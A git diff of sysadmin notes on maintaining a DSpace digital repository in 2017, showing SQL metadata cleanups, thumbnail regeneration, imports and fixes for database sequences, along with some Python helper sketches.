    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
     
    • Run all DOI corrections on CGSpace
    • Something to think about here is to write a Curation Task in Java to do these sanity checks / corrections every night
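
As a starting point for such a nightly sanity check, the DOI fixes above could be prototyped in Python before writing a Java Curation Task. This is a rough sketch, not the queries that were run: the rule list and the name `normalize_doi` are hypothetical, the `doi:` prefix is matched case-insensitively (an assumption), and the patterns capture only the part after the host so that the host is not repeated in the result.

```python
import re

# Ordered (pattern, replacement) pairs, loosely mirroring the SQL above.
DOI_RULES = [
    (re.compile(r"^doi:\s*(10\..+)$", re.IGNORECASE), r"https://dx.doi.org/\1"),
    (re.compile(r"^(10\..+)$"), r"https://dx.doi.org/\1"),
    (re.compile(r"^dx\.doi\.org\.?/(.+)$"), r"https://dx.doi.org/\1"),
    (re.compile(r"^http//dx\.doi\.org/(.+)$"), r"https://dx.doi.org/\1"),
    (re.compile(r"^http://dx\.doi\.org/(.+)$"), r"https://dx.doi.org/\1"),
]


def normalize_doi(value: str) -> str:
    """Return the value rewritten by the first matching rule, else unchanged."""
    value = value.strip()
    for pattern, replacement in DOI_RULES:
        if pattern.match(value):
            return pattern.sub(replacement, value)
    return value


print(normalize_doi("doi:10.5337/2016.200"))
```

Values that match no rule (for example `bb` or `CPWF Mekong`) are returned unchanged, so they would still need to be reviewed or deleted by hand.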
    • @@ -282,10 +281,10 @@ dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agro
    $ python
     Python 3.6.0 (default, Dec 25 2016, 17:30:53)
    ->>> print('Entwicklung & Ländlicher Raum')
    +>>> print('Entwicklung & Ländlicher Raum')
     Entwicklung & Ländlicher Raum
    ->>> print('Entwicklung & Ländlicher Raum'.encode())
    -b'Entwicklung & L\xc3\xa4ndlicher Raum'
    +>>> print('Entwicklung & Ländlicher Raum'.encode())
    +b'Entwicklung & L\xc3\xa4ndlicher Raum'
     
    • So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really was a temporary problem, perhaps due to macOS or the Python build I was using.
    @@ -294,11 +293,11 @@ b'Entwicklung & L\xc3\xa4ndlicher Raum'
  • Testing regenerating PDF thumbnails, like I started in 2016-11
  • It seems there is a bug in filter-media that causes it to process formats that aren’t part of its configuration:
  • -
    $ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p "ImageMagick PDF Thumbnail"
    +
    $ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p "ImageMagick PDF Thumbnail"
     File: earlywinproposal_esa_postharvest.pdf.jpg
    -FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
    +FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
     File: postHarvest.jpg.jpg
    -FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
    +FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
     
    • According to dspace.cfg the ImageMagick PDF Thumbnail plugin should only process PDFs:
    @@ -317,8 +316,8 @@ filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = A
    • Find all fields with “http://hdl.handle.net” values (most are in dc.identifier.uri, but some are in other URL-related fields like cg.link.reference, cg.identifier.dataurl, and cg.identifier.url):
    -
    dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
    +
    dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
     UPDATE 58633
     
    • This works but I’m thinking I’ll wait on the replacement as there are perhaps some other places that rely on http://hdl.handle.net (grep the code, it’s scary how many things are hard coded)
    • @@ -345,7 +344,7 @@ Certificate chain
    • For some reason it is now signed by a private certificate authority
    • This error seems to have started on 2017-02-25:
    -
    $ grep -c "unable to find valid certification path" [dspace]/log/dspace.log.2017-02-*
    +
    $ grep -c "unable to find valid certification path" [dspace]/log/dspace.log.2017-02-*
     [dspace]/log/dspace.log.2017-02-01:0
     [dspace]/log/dspace.log.2017-02-02:0
     [dspace]/log/dspace.log.2017-02-03:0
    @@ -381,7 +380,7 @@ Certificate chain
     
  • The problem likely lies in the logic of ImageMagickThumbnailFilter.java, as ImageMagickPdfThumbnailFilter.java extends it
  • Run CIAT corrections on CGSpace
  • -
    dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
    +
    dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
     
    • CGNET has fixed the certificate chain on their LDAP server
    • Redeploy CGSpace and DSpace Test on the latest 5_x-prod branch with fixes for LDAP bind user
    • @@ -393,12 +392,12 @@ Certificate chain
    • Ah, this is probably because some items have the International Center for Tropical Agriculture author twice, which I first noticed in 2016-12 but couldn’t figure out how to fix
    • I think I can do it by first exporting all metadatavalues that have the author International Center for Tropical Agriculture
    -
    dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
    +
    dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
     COPY 1968
     
    • And then use awk to print the duplicate lines to a separate file:
    -
    $ awk -F',' 'seen[$1]++' /tmp/ciat.csv > /tmp/ciat-dupes.csv
    +
    $ awk -F',' 'seen[$1]++' /tmp/ciat.csv > /tmp/ciat-dupes.csv
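
The awk idiom `seen[$1]++` prints a line only when its first field has already been seen, so the first occurrence of each `resource_id` is kept and every later one is reported. A minimal Python sketch of the same logic follows; the function name `duplicate_rows` and the sample rows are hypothetical.

```python
import csv


def duplicate_rows(lines):
    """Return rows whose first column was already seen on an earlier row."""
    seen = set()
    dupes = []
    for row in csv.reader(lines):
        if not row:
            continue  # skip blank lines
        key = row[0]
        if key in seen:
            dupes.append(row)
        else:
            seen.add(key)
    return dupes


# Hypothetical resource_id,metadata_value_id pairs.
sample = ["100,1", "101,2", "100,3", "100,4"]
print(duplicate_rows(sample))
```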
     
    • From that file I can create a list of 279 deletes and put them in a batch script like:
    diff --git a/docs/2017-03/index.html b/docs/2017-03/index.html index e22ece9c3..8d8956f40 100644 --- a/docs/2017-03/index.html +++ b/docs/2017-03/index.html @@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x’s thumbnails were sRGB, but forcing reg $ identify ~/Desktop/alc_contrastes_desafios.jpg /Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000 "/> - + @@ -180,9 +180,9 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
  • Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)
  • This is trivial with identify (even by the Java ImageMagick API):
  • -
    $ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
    +
    $ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
     DirectClass CMYK
    -$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
    +$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
     DirectClass sRGB Alpha
     

    2017-03-04

      @@ -196,7 +196,7 @@ DirectClass sRGB Alpha
    • They want something like the items that are returned by the general “LAND” query in the search interface, but we cannot do that
    • We can only return specific results for metadata fields, like:
    -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "LAND REFORM", "language": null}' | json_pp
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "LAND REFORM", "language": null}' | json_pp
     
    • But there are hundreds of combinations of fields and values (like dc.subject and all the center subjects), and we can’t use wildcards in REST!
    • Reading about enabling multiple handle prefixes in DSpace
    • @@ -212,11 +212,11 @@ DirectClass sRGB Alpha
    • Because of this I noticed that our Handle server’s config.dct was potentially misconfigured!
    • We had some default values still present:
    -
    "300:0.NA/YOUR_NAMING_AUTHORITY"
    +
    "300:0.NA/YOUR_NAMING_AUTHORITY"
     
    • I’ve changed them to the following and restarted the handle server:
    -
    "300:0.NA/10568"
    +
    "300:0.NA/10568"
     
    • In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk
    • From dspace/config/crosswalks/google-metadata.properties:
    • @@ -225,10 +225,10 @@ DirectClass sRGB Alpha
    • This works, and makes DSpace output the following metadata on the item view page:
    -
    <meta content="https://dx.doi.org/10.1186/s13059-017-1153-y" name="citation_doi">
    +
    <meta content="https://dx.doi.org/10.1186/s13059-017-1153-y" name="citation_doi">
     

    2017-03-06

    @@ -260,7 +260,7 @@ DirectClass sRGB Alpha
    • Export list of sponsors so Peter can clean it up:
    -
    dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
    +
    dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
     COPY 285
     

    2017-03-12

      @@ -271,7 +271,7 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
    • Generate a new list of unique sponsors so we can update the controlled vocabulary:
    -
    dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
    +
    dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
     
    • Pull request for controlled vocabulary if Peter approves: https://github.com/ilri/DSpace/pull/308
    • Review Sisay’s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: https://github.com/ilri/DSpace/pull/307
    • @@ -325,11 +325,11 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
      • Dump a list of fields in the DC and CG schemas to compare with CG Core:
      -
      dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
      +
      dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
       
      • Ooh, a better one!
      -
      dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
      +
      dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
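
The second query relies on `concat_ws` skipping NULL values, so fields without a qualifier do not end up with a trailing dot. The same naming rule in Python, as a sketch only (the function name `field_name` is hypothetical, and schema ID 1 is assumed to be `dc` as in the query):

```python
def field_name(schema_id, element, qualifier=None):
    """Join schema prefix, element and optional qualifier with dots."""
    prefix = "dc" if schema_id == 1 else "cg"
    parts = [prefix, element, qualifier]
    # Like concat_ws, leave out missing (None) parts entirely.
    return ".".join(p for p in parts if p is not None)


print(field_name(1, "identifier", "uri"))
print(field_name(1, "title"))
```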
       

      2017-03-30

      • Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as the nightly Solr indexing generally causes usage of around 150–190%, so this should make the alerts less frequent
      • diff --git a/docs/2017-04/index.html b/docs/2017-04/index.html index 8ffbd5da9..8ab981a25 100644 --- a/docs/2017-04/index.html +++ b/docs/2017-04/index.html @@ -17,7 +17,7 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i Remove redundant/duplicate text in the DSpace submission license Testing the CMYK patch on a collection with 650 items: -$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt +$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt " /> @@ -38,9 +38,9 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i Remove redundant/duplicate text in the DSpace submission license Testing the CMYK patch on a collection with 650 items: -$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt +$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt "/> - + @@ -136,12 +136,12 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Th
      • Remove redundant/duplicate text in the DSpace submission license
      • Testing the CMYK patch on a collection with 650 items:
      -
      $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
      +
      $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
       

      2017-04-03

      • Continue testing the CMYK patch on more communities:
      -
      $ [dspace]/bin/dspace filter-media -f -i 10568/1 -p "ImageMagick PDF Thumbnail" -v >> /tmp/filter-media-cmyk.txt 2>&1
      +
      $ [dspace]/bin/dspace filter-media -f -i 10568/1 -p "ImageMagick PDF Thumbnail" -v >> /tmp/filter-media-cmyk.txt 2>&1
       
      • So far there are almost 500:
      @@ -174,17 +174,17 @@ ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0
      • This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a “checksum” (ie, there was a bitstream in the submission):
      -
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
      +
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
       
      • Then this one does the same, but for fields that don’t contain checksums (ie, there was no bitstream in the submission):
      -
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
      +
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
       
      • For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.
      • It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled…
      • In that case it might just be better to see how many the user submitted (both with and without bitstreams):
      -
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
      +
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
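
To experiment with these patterns outside the database, a small Python sketch can classify provenance text in the same way. The names and sample strings below are hypothetical. One assumption worth noting: PostgreSQL's `~` operator lets `.` match newlines by default, so `re.DOTALL` is used here to get comparable behaviour on multi-line provenance values.

```python
import re

# Mirrors the patterns in the queries above; DOTALL lets "." span newlines.
ANY_ACTION = re.compile(r"^(Submitted|Approved).*giampieri.*2016-", re.DOTALL)
WITH_CHECKSUM = re.compile(
    r"^(Submitted|Approved).*giampieri.*2016-.*checksum", re.DOTALL
)


def classify(text):
    """Return 'bitstream', 'no bitstream', or None if the text does not match."""
    if not ANY_ACTION.search(text):
        return None
    return "bitstream" if WITH_CHECKSUM.search(text) else "no bitstream"


# Hypothetical provenance values.
with_file = (
    "Submitted by A User (giampieri@example.org) on 2016-03-01T10:00:00Z\n"
    "No. of bitstreams: 1\nreport.pdf: 113462 bytes, checksum: abc (MD5)"
)
without_file = "Approved for entry into archive by giampieri on 2016-03-02"
print(classify(with_file), classify(without_file))
```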
       

      2017-04-05

      • After doing a few more large communities it seems this is the final count of CMYK PDFs:
      • @@ -273,7 +273,7 @@ OAI 2.0 manager action ended. It took 829 seconds.
      • The import command should theoretically catch situations like this where an item’s metadata was updated, but in this case we changed the metadata schema and it doesn’t seem to catch it (could be a bug!)
      • Attempting a full rebuild of OAI on CGSpace:
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
       $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
       ...
       58700 items imported so far...
      @@ -326,8 +326,8 @@ sys     1m29.310s
       
    • One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see harvester.autoStart in dspace/config/modules/oai.cfg)
    • Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(435) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(435) is still referenced from table "bundle".
     

    2017-04-18

    • I used Ansible to create a PostgreSQL user that only has SELECT privileges on the tables it needs:
    -
    $ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present'
    +
    $ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present'
     
    • Need to look into running this via systemd
    • This is interesting for creating runnable commands from bundle:
    • @@ -360,15 +360,15 @@ $ rails -s
    • Looking at 933 CIAT records from Sisay, he’s having problems creating a SAF bundle to import to DSpace Test
    • I started by looking at his CSV in OpenRefine, and I see there are a bunch of fields with whitespace issues that I cleaned up:
    -
    value.replace(" ||","||").replace("|| ","||").replace(" || ","||")
    +
    value.replace(" ||","||").replace("|| ","||").replace(" || ","||")
     
    • Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:
    -
    unescape(value,"url")
    +
    unescape(value,"url")
     
    • Then create the filename column using the following transform from URL:
    -
    value.split('/')[-1].replace(/#.*$/,"")
    +
    value.split('/')[-1].replace(/#.*$/,"")
     
    • The replace part is because some URLs have an anchor like #page=14 which we obviously don’t want on the filename
    • Also, we need to only use the PDF on the item corresponding with page 1, so we don’t end up with literally hundreds of duplicate PDFs
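For reference, the OpenRefine transforms above (separator cleanup, URL decoding, and deriving the filename) can be sketched in plain Python. This is only an illustration, not what I ran: the function names and the example URL are made up, and the regex strips any run of whitespace around `||`, which is slightly broader than the chained GREL `replace()` calls.

```python
import re
from urllib.parse import unquote


def normalize_separators(value: str) -> str:
    """Strip whitespace on either side of the "||" multi-value separator."""
    return re.sub(r"\s*\|\|\s*", "||", value)


def filename_from_url(url: str) -> str:
    """Decode URL escapes, keep the last path segment, drop any #anchor."""
    decoded = unquote(url)                     # like unescape(value, "url")
    last_segment = decoded.split("/")[-1]      # like value.split('/')[-1]
    return re.sub(r"#.*$", "", last_segment)   # like .replace(/#.*$/, "")


if __name__ == "__main__":
    print(normalize_separators("maize || beans ||cassava"))
    # Hypothetical URL, only to show the anchor being removed
    print(filename_from_url("http://example.org/files/Annual%20Report.pdf#page=14"))
```

Decoding before splitting mirrors the order of the steps above; if a URL contained an encoded slash or hash, splitting first would give a different result.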
    • @@ -381,7 +381,7 @@ $ rails -s
    • Looking at the CIAT data again, a bunch of items have metadata values ending in ||, which might cause blank fields to be added at import time
    • Cleaning them up with OpenRefine:
    -
    value.replace(/\|\|$/,"")
    +
    value.replace(/\|\|$/,"")
     
    • Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle
    • I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items
    • @@ -395,7 +395,7 @@ $ rails -s
    • Add a description to the file names using:
    -
    value + "__description:" + cells["dc.type"].value
    +
    value + "__description:" + cells["dc.type"].value
     
    • Test import of 933 records:
    @@ -409,8 +409,8 @@ $ wc -l /tmp/ciat
  • More work on Ansible infrastructure stuff for Tsega’s CKM DSpace REST API
  • I’m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    -$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
     

    2017-04-22

    • Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the cleanup task
    • @@ -447,7 +447,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
    • Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:
    -
    # grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
    +
    # grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
     [dspace]/log/dspace.log.2017-04-01:0
     [dspace]/log/dspace.log.2017-04-02:0
     [dspace]/log/dspace.log.2017-04-03:0
    diff --git a/docs/2017-05/index.html b/docs/2017-05/index.html
    index e5851031a..80fcc9b69 100644
    --- a/docs/2017-05/index.html
    +++ b/docs/2017-05/index.html
    @@ -18,7 +18,7 @@
     
     
     
    -
    +
     
     
         
    @@ -159,7 +159,7 @@
     
  • This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using dspace cleanup -v, or else you’ll run out of disk space
  • In the end I realized it’s better to use submission mode (-s) to ingest the community object as a single AIP without its children, followed by each of the collections:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit"
     $ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
     $ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
     $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
    @@ -184,13 +184,13 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
     
  • The CGIAR Library metadata has some blank metadata values, which leads to ||| in the Discovery facets
  • Clean these up in the database using:
  • -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     
    • I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up
    • Hours into the re-ingestion I ran into more errors, and had to erase everything and start over again!
    • Now, no matter what I do I keep getting foreign key errors…
    -
    Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"
    +
    Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"
       Detail: Key (handle_id)=(80928) already exists.
     
    • I think those errors actually come from me running the update-sequences.sql script while Tomcat/DSpace are running
    • @@ -202,7 +202,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
    • I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields
    • Finally finished importing all the CGIAR Library content, final method was:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit"
     $ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
     $ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
     $ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
    @@ -215,7 +215,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
     
  • The -XX:-UseGCOverheadLimit JVM option helps with some issues in large imports
  • After this I ran the update-sequences.sql script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:
  • -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     

    2017-05-13

    • After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually NUL characters in the dc.description.abstract field (at least) on the lines where CSV importing was failing
    • @@ -230,7 +230,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
    • Merge changes to CCAFS project identifiers and flagships: #320
    • Run updates for CCAFS flagships on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
     
    • These include:

      @@ -258,7 +258,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
      • Looking into the error I get when trying to create a new collection on DSpace Test:
      -
      ERROR: duplicate key value violates unique constraint "handle_pkey" Detail: Key (handle_id)=(84834) already exists.
      +
      ERROR: duplicate key value violates unique constraint "handle_pkey" Detail: Key (handle_id)=(84834) already exists.
       
      • I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn’t helped
      • It appears item with handle_id 84834 is one of the imported CGIAR Library items:
      • @@ -279,7 +279,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
      • I’ve posted on the dspace-tech mailing list to see if I can just manually set the handle_seq to that value
      • Actually, it seems I can manually set the handle sequence using:
      -
      dspace=# select setval('handle_seq',86873);
      +
      dspace=# select setval('handle_seq',86873);
       
      • After that I can create collections just fine, though I’m not sure if it has other side effects
      @@ -294,31 +294,31 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
    • Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested
    • Peter wanted a list of authors in here, so I generated a list of collections using the “View Source” on each community and this hacky awk:
    -
    $ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3"/"$4}' | awk -F\" '{print $1}' | vim -
    +
    $ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3"/"$4}' | awk -F\" '{print $1}' | vim -
     
    • Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:
    dspace=# select distinct text_value
     from metadatavalue
    -where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
    +where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
     AND resource_type_id = 2
    -AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
    -0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
